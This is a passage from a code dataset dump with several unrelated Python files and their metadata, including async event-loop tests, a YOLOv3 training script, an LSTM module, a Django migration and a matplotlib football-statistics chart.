time_\n return []\n\n selector.select = Mock(wraps=selector_select)\n return selector\n\n\n@pytest.fixture\ndef loop_policy(selector, clock):\n @contextlib.contextmanager\n def create_loop():\n yield BaseEventLoop(selector, clock=clock)\n\n policy = Mock(LoopPolicy)\n policy.create_loop = create_loop\n policy.create_loop_runner = lambda loop: BaseLoopRunner(loop)\n policy.create_networking.side_effect = RuntimeError(\"Forbidden\")\n policy.create_executor.side_effect = RuntimeError(\"Forbidden\")\n\n with patch.object(aio.loop._priv.loop_global_cfg, \"policy\", policy, create=True):\n yield policy\n\n\nclass TestLoopStepping:\n @pytest.fixture\n def make_loop(self, selector, clock):\n return lambda scheduler: BaseEventLoop(\n selector,\n clock=clock,\n scheduler=scheduler,\n exception_handler=process_callback_exception,\n )\n\n def test_runs_io_callbacks(self, selector, make_loop):\n # TODO\n pass\n\n def test_runs_only_expired_cbs(self, clock, selector, make_loop):\n parent_cb = Mock()\n cb0 = parent_cb.cb0\n cb1 = parent_cb.cb1\n scheduler = Scheduler([], [Handle(55.0, cb0), Handle(60.0, cb1)])\n\n make_loop(scheduler).run_step()\n\n assert selector.mock_calls == [call.select(5.0)]\n assert scheduler.get_items() == [Handle(60.0, cb1)]\n assert parent_cb.mock_calls == [\n call.cb0(),\n ]\n assert clock.now() == 55.0\n\n def test_dont_runs_pending_if_cancelled(self, clock, selector, make_loop):\n parent_cb = Mock()\n cb1 = parent_cb.cb1\n cb2 = parent_cb.cb2\n handle1 = Handle(None, cb1, cancelled=True)\n handle2 = Handle(60.0, cb2)\n scheduler = Scheduler([handle1], [handle2])\n\n make_loop(scheduler).run_step()\n\n assert selector.mock_calls == [call.select(10.0)]\n assert scheduler.get_items() == []\n assert parent_cb.mock_calls == [\n call.cb2(),\n ]\n assert clock.now() == 60.0\n\n def test_dont_runs_enqueued_if_cancelled(self, clock, selector, make_loop):\n parent_cb = Mock()\n cb1 = parent_cb.cb1\n cb2 = parent_cb.cb2\n handle1 = Handle(55.0, cb1, cancelled=True)\n handle2 = Handle(60.0, cb2)\n scheduler = Scheduler([], [handle1, handle2])\n\n make_loop(scheduler).run_step()\n\n assert selector.mock_calls == [call.select(10.0)]\n assert scheduler.get_items() == []\n assert parent_cb.mock_calls == [\n call.cb2(),\n ]\n assert clock.now() == 60.0\n\n def test_dont_runs_pending_if_cancelled_during_select(self, clock, selector, make_loop):\n parent_cb = Mock()\n cb1 = parent_cb.cb1\n cb2 = parent_cb.cb2\n handle1 = Handle(55.0, cb1)\n handle2 = Handle(60.0, cb2)\n scheduler = Scheduler([], [handle1, handle2])\n selector.select.side_effect = (\n # returning DEFAULT force mock to proceed to call 'wraps' object\n lambda *_: (handle1.cancel() or DEFAULT)\n )\n\n make_loop(scheduler).run_step()\n\n assert selector.mock_calls == [call.select(5.0)]\n assert scheduler.get_items() == [handle2]\n assert parent_cb.mock_calls == []\n assert clock.now() == 55.0\n\n @pytest.mark.parametrize(\"same_time_events_count\", [2, 3, 4, 5])\n def test_runs_only_expired_cbs_have_same_time_events(\n self, clock, selector, make_loop, same_time_events_count\n ):\n parent_cb = Mock()\n cbs = [getattr(parent_cb, f\"cb{i}\") for i in range(same_time_events_count)]\n last_cb = parent_cb.cb2\n scheduler = Scheduler([], [Handle(55.0, cb) for cb in cbs] + [Handle(60.0, last_cb)])\n\n make_loop(scheduler).run_step()\n\n assert scheduler.get_items() == [Handle(60.0, last_cb)]\n assert parent_cb.mock_calls == [\n getattr(call, f\"cb{i}\")() for i in range(same_time_events_count)\n ]\n assert selector.mock_calls == 
[call.select(5.0)]\n assert clock.now() == 55.0\n\n def test_runs_only_expired_cbs2(self, clock, selector, make_loop):\n parent_cb = Mock()\n cb0 = parent_cb.cb0\n cb1 = parent_cb.cb1\n scheduler = Scheduler([], [Handle(55.0, cb0), Handle(60.0, cb1)])\n loop = make_loop(scheduler)\n\n loop.run_step()\n assert selector.mock_calls == [call.select(5.0)]\n assert clock.now() == 55.0\n assert parent_cb.mock_calls == [\n call.cb0(),\n ]\n\n loop.run_step()\n assert scheduler.get_items() == []\n assert parent_cb.mock_calls == [\n call.cb0(),\n call.cb1(),\n ]\n assert selector.mock_calls == [call.select(5.0), call.select(5.0)]\n assert clock.now() == 60.0\n\n def test_runs_only_expired_cbs3(self, clock, selector, make_loop):\n parent_cb = Mock()\n cb0 = parent_cb.cb0\n cb1 = parent_cb.cb1\n cb2 = parent_cb.cb2\n scheduler = Scheduler([], [Handle(55.0, cb0), Handle(60.0, cb1), Handle(65.0, cb2)])\n loop = make_loop(scheduler)\n\n for i in range(3):\n loop.run_step()\n\n assert scheduler.get_items() == []\n assert parent_cb.mock_calls == [\n call.cb0(),\n call.cb1(),\n call.cb2(),\n ]\n assert selector.mock_calls == [\n call.select(5.0),\n call.select(5.0),\n call.select(5.0),\n ]\n assert clock.now() == 65.0\n\n def test_runs_pending_cbs_immediately(self, clock, selector, make_loop):\n parent_cb = Mock()\n cb0 = parent_cb.cb0\n cb1 = parent_cb.cb1\n scheduler = Scheduler([Handle(None, cb0), Handle(None, cb1)])\n loop = make_loop(scheduler)\n\n loop.run_step()\n\n assert scheduler.get_items() == []\n assert parent_cb.mock_calls == [call.cb0(), call.cb1()]\n assert selector.mock_calls == [call.select(0)]\n assert clock.now() == 50.0\n\n def test_runs_only_pending_cbs(self, selector, clock, make_loop):\n cb1 = Mock()\n cb2 = Mock()\n scheduler = Scheduler([Handle(None, cb1)], [Handle(60, cb2)])\n loop = make_loop(scheduler)\n\n loop.run_step()\n\n assert scheduler.get_items() == [Handle(60, cb2)]\n assert cb1.mock_calls == [call()]\n assert cb2.mock_calls == []\n assert selector.mock_calls == [call.select(0)]\n assert clock.now() == 50\n\n @pytest.mark.parametrize(\"now\", [0.0, 15.0])\n def test_executes_handle_eagerly_if_time_less_clock_resolution(\n self, selector, clock, make_loop, now\n ):\n clock.now.return_value = now\n cb1 = Mock()\n cb2 = Mock()\n h1 = Handle(now + clock.resolution() / 2, cb1)\n h2 = Handle(now + clock.resolution() * 2, cb2)\n scheduler = Scheduler([], [h1, h2])\n loop = make_loop(scheduler)\n\n loop.run_step()\n\n assert scheduler.get_items() == [h2]\n assert cb1.mock_calls == [call()]\n assert selector.mock_calls == [call.select(0)]\n assert clock.now() == now\n\n def test_run_both_pending_and_scheduled(self, clock, selector, make_loop):\n parent_cb = Mock()\n rcb0 = parent_cb.rcb0\n rcb1 = parent_cb.rcb1\n scb0 = parent_cb.scb0\n scb1 = parent_cb.scb1\n\n scheduler = Scheduler(\n [Handle(None, rcb0), Handle(None, rcb1)],\n [Handle(55.0, scb0), Handle(60.0, scb1)],\n )\n loop = make_loop(scheduler)\n\n # must consume all pending cbs and first scheduled on second step\n for i in range(2):\n loop.run_step()\n\n assert scheduler.get_items() == [Handle(60.0, scb1)]\n assert selector.mock_calls == [call.select(0), call.select(5.0)]\n\n # call order isn't guarantied\n assert sorted(parent_cb.mock_calls) == sorted([call.rcb0(), call.rcb1(), call.scb0()])\n\n def test_enqueue_pending_during_select(self, selector, clock, make_loop):\n first_cb = Mock(name=\"first-cb\")\n enqueued_cb = Mock(name=\"enqueued-cb\")\n\n scheduler = Scheduler(enqueued=[Handle(55.0, first_cb)])\n loop = 
make_loop(scheduler)\n\n selector.select.side_effect = (\n # returning DEFAULT force mock to proceed to call 'wraps' object\n lambda *_: (scheduler.enqueue(Handle(None, enqueued_cb)) or DEFAULT)\n )\n\n loop.run_step()\n\n assert selector.mock_calls == [call.select(5.0)]\n assert first_cb.mock_calls == [call()]\n assert enqueued_cb.mock_calls == [call()]\n assert scheduler.get_items() == []\n\n def test_enqueue_later_during_select(self, selector, clock, make_loop):\n first_cb = Mock(name=\"first-cb\")\n enqueued_cb = Mock(name=\"enqueued-cb\")\n\n scheduler = Scheduler(enqueued=[Handle(55.0, first_cb)])\n loop = make_loop(scheduler)\n\n selector.select.side_effect = (\n # returning DEFAULT force mock to proceed to call 'wraps' object\n lambda *_: (scheduler.enqueue(Handle(clock.now(), enqueued_cb)) or DEFAULT)\n )\n\n loop.run_step()\n\n assert selector.mock_calls == [call.select(5.0)]\n assert first_cb.mock_calls == [call()]\n assert enqueued_cb.mock_calls == [call()]\n assert scheduler.get_items() == []\n\n def test_enqueue_much_later_during_select(self, selector, clock, make_loop):\n first_cb = Mock(name=\"first-cb\")\n enqueued_cb = Mock(name=\"enqueued-cb\")\n enqueued_handle = Handle(100, enqueued_cb)\n\n scheduler = Scheduler(enqueued=[Handle(55.0, first_cb)])\n loop = make_loop(scheduler)\n\n selector.select.side_effect = (\n # returning DEFAULT force mock to proceed to call 'wraps' object\n lambda *_: (scheduler.enqueue(enqueued_handle) or DEFAULT)\n )\n\n loop.run_step()\n\n assert selector.mock_calls == [call.select(5.0)]\n assert first_cb.mock_calls == [call()]\n assert enqueued_cb.mock_calls == []\n assert scheduler.get_items() == [enqueued_handle]\n\n def test_sets_running_loop_cv_in_handle_callback(self, make_loop):\n with pytest.raises(LookupError):\n aio.loop._priv.running_loop.get()\n\n @mock_wraps\n def handle_cb():\n assert aio.loop._priv.running_loop.get() is loop\n\n loop = make_loop(Scheduler([Handle(None, handle_cb)]))\n loop.run_step()\n assert handle_cb.mock_calls == [call()]\n\n with pytest.raises(LookupError):\n aio.loop._priv.running_loop.get()\n\n def test_sets_running_loop_cv_in_io_callback(self, make_loop, selector):\n with pytest.raises(LookupError):\n aio.loop._priv.running_loop.get()\n\n test_exc = OSError(\"Test OS error\")\n\n @mock_wraps\n def io_callback(*_):\n assert aio.loop._priv.running_loop.get() is loop\n\n selector.select = lambda *_: [(io_callback, 0, 0, test_exc)]\n\n loop = make_loop(Scheduler())\n loop.run_step()\n\n assert io_callback.mock_calls == [call(0, 0, test_exc)]\n\n with pytest.raises(LookupError):\n aio.loop._priv.running_loop.get()\n\n\nclass TestLoopRunner:\n @pytest.fixture\n def loop(self, loop_policy):\n with loop_policy.create_loop() as loop:\n yield loop\n\n @pytest.fixture\n def loop_runner(self, loop_policy, loop):\n return loop_policy.create_loop_runner(loop)\n\n def test_runs_one_callback(self, loop, loop_runner):\n def callback():\n loop_runner.stop_loop()\n\n cb_mock = Mock(wraps=callback)\n\n loop.call_soon(cb_mock)\n\n with pytest.raises(LoopStopped):\n loop_runner.run_loop()\n\n assert cb_mock.mock_calls == [call()]\n\n def test_runs_callbacks_after_stop_callback(self, loop, loop_runner):\n def callback1():\n loop_runner.stop_loop()\n loop.call_soon(cb2_mock)\n\n cb1_mock = Mock(wraps=callback1)\n cb2_mock = Mock()\n\n loop.call_soon(cb1_mock)\n\n with pytest.raises(LoopStopped):\n loop_runner.run_loop()\n\n assert cb1_mock.mock_calls == [call()]\n assert cb2_mock.mock_calls == [call()]\n\n def 
test_runs_late_callbacks_after_stop_callback(self, loop, loop_runner):\n def callback1():\n loop_runner.stop_loop()\n loop.call_later(10, cb2_mock)\n\n cb1_mock = Mock(wraps=callback1)\n cb2_mock = Mock()\n\n loop.call_soon(cb1_mock)\n\n time_before = loop.clock.now()\n with pytest.raises(LoopStopped):\n loop_runner.run_loop()\n\n assert loop.clock.now() - time_before == 10\n assert cb1_mock.mock_calls == [call()]\n assert cb2_mock.mock_calls == [call()]\n\n\n@pytest.mark.usefixtures(\"loop_policy\")\nclass TestEntryRun:\n def test_runs_simple_coroutine(self):\n should_be_called = Mock()\n\n async def root():\n should_be_called()\n\n aio.run(root())\n\n assert should_be_called.mock_calls == [call()]\n\n def test_returns_coroutine_result(self):\n result = Mock(name=\"result\")\n\n async def root():\n return result\n\n assert aio.run(root()) == result\n\n def test_propagates_coroutine_exception(self):\n async def root():\n raise Exception(\"Some exception\")\n\n with pytest.raises(Exception, match=\"Some exception\"):\n aio.run(root())\n\n def test_runs_multi_suspend_coroutine(self, clock):\n should_be_called = Mock()\n\n async def root():\n at_start = clock.now()\n\n for i in range(1, 11):\n await aio.sleep(1)\n assert clock.now() - at_start == 1.0 * i\n\n should_be_called()\n\n aio.run(root())\n assert should_be_called.mock_calls == [call()]\n\n def test_changes_sigint_to_cancelled_v1(self):\n should_be_called = Mock()\n should_not_be_called = Mock()\n\n async def root():\n should_be_called()\n # Probably won't work in a lot of cases and may cause weird behaviour\n os.kill(os.getpid(), signal.SIGINT)\n # Suspend coroutine to initialize further processing\n await aio.sleep(10)\n\n should_not_be_called()\n\n with pytest.raises(aio.KeyboardCancelled):\n aio.run(root())\n\n assert should_be_called.mock_calls == [call()]\n assert should_not_be_called.mock_calls == []\n\n def test_changes_sigint_to_cancelled_v2(self):\n should_be_called = Mock()\n should_not_be_called = Mock()\n\n async def root():\n should_be_called()\n # Probably won't work in a lot of cases and may cause weird behaviour\n loop_ = await aio.loop.get_running()\n loop_.call_soon(os.kill, os.getpid(), signal.SIGINT)\n # Suspend coroutine to initialize further processing\n await aio.sleep(10)\n\n should_not_be_called()\n\n with pytest.raises(aio.KeyboardCancelled):\n aio.run(root())\n\n assert should_be_called.mock_calls == [call()]\n assert should_not_be_called.mock_calls == []\n\n def test_should_warn_if_async_gen_being_gc_while_not_finished(self, clock):\n should_be_called_in_root = Mock()\n should_be_called_in_gen = Mock()\n should_not_be_called_in_gen = Mock()\n\n async def async_gen():\n should_be_called_in_gen()\n yield 1\n yield 2\n should_not_be_called_in_gen()\n\n async def root():\n should_be_called_in_root()\n\n gen = async_gen()\n await gen.asend(None)\n del gen\n\n gc.collect()\n\n with pytest.warns(UserWarning) as warn_info:\n aio.run(root())\n\n assert should_be_called_in_root.mock_calls == [call()]\n assert should_be_called_in_gen.mock_calls == [call()]\n assert should_not_be_called_in_gen.mock_calls == []\n assert any(\n \"Async-generator shutdown request income for\" in warn.message.args[0]\n and warn.filename == __file__\n for warn in warn_info.list\n )\n\n def test_should_not_warn_if_async_gen_being_gc_after_finish(self, clock):\n should_be_called_in_root = Mock()\n should_be_called_in_gen = Mock()\n\n async def async_gen():\n should_be_called_in_gen()\n yield 1\n yield 2\n should_be_called_in_gen()\n\n async 
def root():\n should_be_called_in_root()\n\n async for _ in async_gen():\n pass\n\n gc.collect()\n\n with pytest.WarningsRecorder(_ispytest=True) as warn_info:\n aio.run(root())\n\n assert should_be_called_in_root.mock_calls == [call()]\n assert should_be_called_in_gen.mock_calls == [call(), call()]\n assert warn_info.list == []\n","sub_path":"tests/test_loop.py","file_name":"test_loop.py","file_ext":"py","file_size_in_byte":17912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"160815672","text":"from __future__ import division\n\nfrom models import *\nfrom utils.utils import *\nfrom utils.datasets import *\nfrom utils.parse_config import *\n\nimport os\nimport sys\nimport time\nimport datetime\nimport argparse\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torch.autograd import Variable\nimport torch.optim as optim\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--epochs', type=int, default=30, help='number of epochs')\nparser.add_argument('--image_folder', type=str, default='data/samples', help='path to dataset')\nparser.add_argument('--train_image_path', type=str, default='data/train_data/images', help='path to train images')\nparser.add_argument('--batch_size', type=int, default=8, help='size of each image batch')\nparser.add_argument('--model_config_path', type=str, default='config/yolov3.cfg', help='path to model config file')\nparser.add_argument('--data_config_path', type=str, default='config/coco.data', help='path to data config file')\nparser.add_argument('--weights_path', type=str, default='checkpoints_pre/57.weights', help='path to weights file')\nparser.add_argument('--load_weights', type=bool, default=False, help='whether to load pretrained weights')\nparser.add_argument('--class_path', type=str, default='data/smile.names', help='path to class label file')\nparser.add_argument('--conf_thres', type=float, default=0.8, help='object confidence threshold')\nparser.add_argument('--nms_thres', type=float, default=0.4, help='iou thresshold for non-maximum suppression')\nparser.add_argument('--n_cpu', type=int, default=0, help='number of cpu threads to use during batch generation')\nparser.add_argument('--img_size', type=int, default=416, help='size of each image dimension')\nparser.add_argument('--checkpoint_interval', type=int, default=1, help='interval between saving model weights')\nparser.add_argument('--checkpoint_dir', type=str, default='checkpoints', help='directory where model checkpoints are saved')\nparser.add_argument('--use_cuda', type=bool, default=False, help='whether to use cuda if available')\nopt = parser.parse_args()\nprint(opt)\n\ncuda = torch.cuda.is_available() and opt.use_cuda\n\nos.makedirs('output', exist_ok=True)\nos.makedirs('checkpoints', exist_ok=True)\n\nclasses = load_classes(opt.class_path)\n\n\n# # Get data configuration\n# data_config = parse_data_config(opt.data_config_path)\n# train_path = data_config['train']\n\n# Get hyper parameters\nhyperparams = parse_model_config(opt.model_config_path)[0]\nlearning_rate = float(hyperparams['learning_rate'])\nmomentum = float(hyperparams['momentum'])\ndecay = float(hyperparams['decay'])\nburn_in = int(hyperparams['burn_in'])\n\n\n# Initiate model\nmodel = Darknet(opt.model_config_path)\nif opt.load_weights == True:\n model.load_weights(opt.weights_path)\n print('================================================================================\\n'\n 'Loaded 
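# A note on the test file that ends above: it leans on two unittest.mock idioms
# that are easy to miss. Attaching child mocks to one parent Mock lets relative
# call order be asserted through parent.mock_calls, and a side_effect that
# returns mock.DEFAULT makes the call fall through to the wrapped object.
# A minimal, self-contained sketch of both (standard library only; none of the
# project's aio/loop names are assumed):
from unittest.mock import DEFAULT, Mock, call

parent = Mock()
parent.cb0()
parent.cb1()
assert parent.mock_calls == [call.cb0(), call.cb1()]  # relative order is recorded

probe = Mock(wraps=len)
probe.side_effect = lambda *args: DEFAULT  # DEFAULT -> proceed to the wrapped len()
assert probe("abc") == 3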
pretrained weights: %s\\n' % opt.weights_path)\nelse:\n model.apply(weights_init_normal)\n print('================================================================================\\n'\n '[Warning] No weights loaded!!! Initializing weights\\n'\n ': If you want to load pretrained weights, set the argument load_weights to TRUE\\n')\n\nif cuda:\n model = model.cuda()\n\nmodel.train()\n\n# Get dataloader\ndataloader = torch.utils.data.DataLoader(\n ListDataset(opt.train_image_path),\n batch_size=opt.batch_size, shuffle=False, num_workers=opt.n_cpu)\nprint('Data loaded: %d batches X %d images (with labels)\\n'\n '================================================================================'\n % (len(dataloader), opt.batch_size ))\n\nTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\n\noptimizer = optim.SGD(model.parameters(), lr=learning_rate, momentum=momentum, dampening=0, weight_decay=decay)\n\nprint('Start Training...')\nfor epoch in range(opt.epochs):\n for batch_i, (_, imgs, targets) in enumerate(dataloader):\n imgs = Variable(imgs.type(Tensor))\n targets = Variable(targets.type(Tensor), requires_grad=False)\n\n optimizer.zero_grad()\n\n loss = model(imgs, targets)\n\n loss.backward()\n optimizer.step()\n\n print('[Epoch %d/%d, Batch %d/%d] [Losses: x %f, y %f, w %f, h %f, conf %f, cls %f, total %f, recall: %.5f]' %\n (epoch + 1, opt.epochs, batch_i + 1, len(dataloader),\n model.losses['x'], model.losses['y'], model.losses['w'],\n model.losses['h'], model.losses['conf'], model.losses['cls'],\n loss.item(), model.losses['recall']))\n\n model.seen += imgs.size(0)\n\n if epoch % opt.checkpoint_interval == 0:\n count = opt.weights_path.split('/')[1].split('.')[0]\n model.save_weights('%s/%d.weights' % (opt.checkpoint_dir, epoch+int(count)+1))\n print('Checkpoint saved')\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"312940837","text":"# -*- coding: utf-8 -*-\n\nimport torch\nimport torch.nn as nn\n\n\nclass ParserLSTM(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_layers=1,\n batch_first=False, dropout=0, bidirectional=False):\n super(ParserLSTM, self).__init__()\n\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.num_layers = num_layers\n self.batch_first = batch_first\n self.dropout = dropout\n self.bidirectional = bidirectional\n self.num_directions = 2 if bidirectional else 1\n\n self.f_cells = nn.ModuleList()\n self.b_cells = nn.ModuleList()\n for layer in range(self.num_layers):\n self.f_cells.append(nn.LSTMCell(input_size=input_size,\n hidden_size=hidden_size))\n if bidirectional:\n self.b_cells.append(nn.LSTMCell(input_size=input_size,\n hidden_size=hidden_size))\n input_size = hidden_size * self.num_directions\n\n self.reset_parameters()\n\n def reset_parameters(self):\n for i in self.parameters():\n # apply orthogonal_ to weight\n if len(i.shape) > 1:\n nn.init.orthogonal_(i)\n # apply zeros_ to bias\n else:\n nn.init.zeros_(i)\n\n def _lstm_forward(self, x, hx, mask, cell, in_mask,\n hid_mask, reverse):\n output = []\n seq_len = x.size(0)\n if in_mask is not None:\n x = x * in_mask\n steps = reversed(range(seq_len)) if reverse else range(seq_len)\n\n for t in steps:\n h_next, c_next = cell(input=x[t], hx=hx)\n h_next = h_next * mask[t]\n c_next = c_next * mask[t]\n output.append(h_next)\n if hid_mask is not None:\n h_next = h_next * hid_mask\n hx = (h_next, c_next)\n if reverse:\n 
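# A note on train.py above: its checkpoint naming recovers the starting index
# with weights_path.split('/')[1], which only works for a path exactly one
# directory deep with a numeric stem. A hedged, path-agnostic sketch of the
# same bookkeeping (hypothetical helper, not part of the original script):
import os

def next_checkpoint_path(weights_path, checkpoint_dir, epoch):
    stem = os.path.splitext(os.path.basename(weights_path))[0]  # e.g. "57"
    start = int(stem) if stem.isdigit() else 0  # fall back for non-numeric names
    return os.path.join(checkpoint_dir, "%d.weights" % (start + epoch + 1))

assert next_checkpoint_path("checkpoints_pre/57.weights", "checkpoints", 0).endswith("58.weights")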
output.reverse()\n output = torch.stack(output, 0)\n\n return output\n\n def forward(self, x, mask, hx=None):\n if self.batch_first:\n x = x.transpose(0, 1)\n mask = mask.transpose(0, 1)\n mask = torch.unsqueeze(mask, dim=2).float()\n seq_len, batch_size, input_size = x.shape\n\n if hx is None:\n initial = x.new_zeros(batch_size, self.hidden_size)\n hx = (initial, initial)\n\n for layer in range(self.num_layers):\n in_mask, hid_mask, b_hid_mask = None, None, None\n if self.training:\n in_mask = torch.bernoulli(\n x.new_full((batch_size, x.size(2)), 1 - self.dropout)\n ) / (1 - self.dropout)\n hid_mask = torch.bernoulli(\n x.new_full((batch_size, self.hidden_size),\n 1 - self.dropout)\n ) / (1 - self.dropout)\n if self.bidirectional:\n b_hid_mask = torch.bernoulli(\n x.new_full((batch_size, self.hidden_size),\n 1 - self.dropout)\n ) / (1 - self.dropout)\n\n layer_output = self._lstm_forward(x=x,\n hx=hx,\n mask=mask,\n cell=self.f_cells[layer],\n in_mask=in_mask,\n hid_mask=hid_mask,\n reverse=False)\n\n if self.bidirectional:\n b_layer_output = self._lstm_forward(x=x,\n hx=hx,\n mask=mask,\n cell=self.b_cells[layer],\n in_mask=in_mask,\n hid_mask=b_hid_mask,\n reverse=True)\n if self.bidirectional:\n x = torch.cat([layer_output, b_layer_output], 2)\n else:\n x = layer_output\n\n if self.batch_first:\n x = x.transpose(0, 1)\n\n return x\n","sub_path":"parser/modules/parser_lstm.py","file_name":"parser_lstm.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"644083885","text":"# coding=utf-8\nfrom __future__ import unicode_literals\n\nimport django.db.models.deletion\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='RateSource',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100)),\n ('base_currency', models.CharField(default=b'EUR', max_length=3, blank=True)),\n ('last_update', models.DateTimeField(auto_now=True)),\n ],\n ),\n migrations.CreateModel(\n name='Rate',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('currency', models.CharField(max_length=3)),\n ('value', models.DecimalField(max_digits=14, decimal_places=6)),\n ('date', models.DateField(auto_now_add=True)),\n ],\n ),\n migrations.AddField(\n model_name='rate',\n name='source',\n field=models.ForeignKey(\n related_query_name=b'rate', related_name='rates', on_delete=models.PROTECT, to='txmoneyrates.RateSource'\n ),\n ),\n migrations.AlterUniqueTogether(\n name='ratesource',\n unique_together={('name', 'base_currency')},\n ),\n migrations.AlterUniqueTogether(\n name='rate',\n unique_together={('source', 'currency', 'date')},\n ),\n ]\n","sub_path":"txmoney/rates/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"425492692","text":"# Enter your code here. Read input from STDIN. 
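# A smoke test for the ParserLSTM module above. With batch_first=False (the
# default) it expects (seq_len, batch, input) inputs and a (seq_len, batch)
# padding mask. The import path below is an assumption taken from the record's
# sub_path and may clash with the stdlib "parser" module on older Pythons:
import torch
from parser.modules.parser_lstm import ParserLSTM  # assumed import path

lstm = ParserLSTM(input_size=8, hidden_size=16, bidirectional=True, dropout=0.1)
x = torch.randn(4, 2, 8)   # seq_len=4, batch=2
mask = torch.ones(4, 2)    # 1.0 = real token, 0.0 = padding
mask[3, 1] = 0.0           # second sequence is one step shorter
out = lstm(x, mask)
assert out.shape == (4, 2, 32)  # hidden_size * num_directions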
Print output to STDOUT\r\ndef solve(s):\r\n l=[]\r\n g=[]\r\n l.append(s.split(' '))\r\n \r\n \r\n for i in l[0][::]:\r\n c=i.capitalize()\r\n g.append(c)\r\n return \" \".join(g)","sub_path":"Capitalize.py","file_name":"Capitalize.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"151006660","text":"from p37_csv_DictReader使用_num和getcolors函数 import num\nfrom p37_csv_DictReader使用_num和getcolors函数 import getcolors\n\nimport csv\nimport matplotlib.pyplot as plt\n\n\n\n\ndef getQbNames():\n\tqbnames = ['peyton Manning']\n\t# name = ''\n\ti = 0\n\twith open('./qb_data.csv') as csvfile:\n\t\treader = csv.DictReader(csvfile)\n\t\tfor row in reader:\n\t\t\tif(qbnames[i] != row['Name']):\n\t\t\t\tqbnames.append(row['Name'])\n\t\t\t\ti = i+ 1\n\treturn qbnames\n\ndef readQbdata():\n\tresultdata = []\n\twith open('./qb_data.csv') as csvfile:\n\t\treader = csv.DictReader(csvfile)\n\t\tresultdata = [row for row in reader]\n\t\treturn resultdata\n\n# fdata = []\n# prevysum = 0\n\n\nqbnames = getQbNames()\nfdata = readQbdata()\n\ni = 0\n# rank = 0\nprevysum = 0\nlastyr = 0\nhighrank = 300\ncolorsdata = getcolors()\n\nfig = plt.figure(figsize=(15,13))\nax = fig.add_subplot(111, facecolor='white')\n\n# limits for TD\nplt.xlim(10,800)\nplt.ylim(1940,2021)\n\ncolindex = 0\nlastage = 20\n\n\nfor qbn in qbnames:\n\tx = []\n\ty = []\n\tprevysum = 0\n\tfor row in fdata:\n\t\tif(row['Name'] == qbn and row['Year'] != 'Career'):\n\t\t\tyrval = num(row['Year'])\n\t\t\tlastage = num(row['Age'])\n\t\t\tprevysum += num(row['TD'])\n\t\t\tlastyr = yrval\n\t\t\ty += [yrval]\n\t\t\tx += [prevysum]\n\n\n\tif(prevysum > highrank):\n\t\tplt.plot(x, y, color=colorsdata[colindex], label=qbn, linewidth=2.5)\n\t\tplt.legend(loc=0, prop={'size':10})\n\t\tcolindex = (colindex+1)%22\n\t\tif qbn == 'Tom Brady':\n\t\t\tplt.text( prevysum+2,lastyr+1, qbn+\"(\"+str(prevysum)+\"):\"+str(lastage), \\\n\t\t\tfontsize=9)\n\t\telse:\n\t\t\tplt.text( prevysum+2,lastyr-1, qbn+\"(\"+str(prevysum)+\"):\"+str(lastage), \\\n\t\t\tfontsize=9)\n\telse:\n\t\tplt.plot(x, y, color=colorsdata[22], linewidth=1.5)\nplt.xlabel('Year', fontsize=18)\nplt.ylabel('Cumulative Touch Downs', fontsize=18)\nplt.title(\"Cumulative Touch Downs by Quarter Backs\", fontsize=20)\nplt.show()\n","sub_path":"python数据可视化/p42_体育案例_(触地得分,年份).py","file_name":"p42_体育案例_(触地得分,年份).py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"189006739","text":"\n\n\ndef get_input(data_type, message):\n \"\"\"Asks the user for input and confirms input is correct\"\"\"\n response = raw_input(\"{}{}\".format(message, \"\\n\"))\n\n # Ask User to confirm input\n check_confirmation = 1\n while check_confirmation == 1:\n confirm = raw_input(\n \"You entered: '{}'. Press ENTER if that is correct:\".format(response))\n if confirm == '':\n check_confirmation = 0\n else:\n response = raw_input(\"{}{}\".format(message, \"\\n\"))\n\n # If input is wrong type, prompt user for input again\n check_error = 1\n while check_error == 1:\n try:\n response = data_type(response)\n except:\n error_message = \"Your input isn't the correct type. 
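# The plotting script above accumulates touchdowns with nested loops over a
# DictReader. If pandas is available, the same per-quarterback running total
# falls out of one groupby. Column names are taken from the script itself;
# qb_data.csv is assumed to exist with those columns:
import pandas as pd

qb = pd.read_csv("./qb_data.csv")
qb = qb[qb["Year"] != "Career"]
qb["TD"] = pd.to_numeric(qb["TD"], errors="coerce").fillna(0)  # mirrors the num() coercion
qb["cumTD"] = qb.groupby("Name")["TD"].cumsum()  # cumulative TDs per QB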
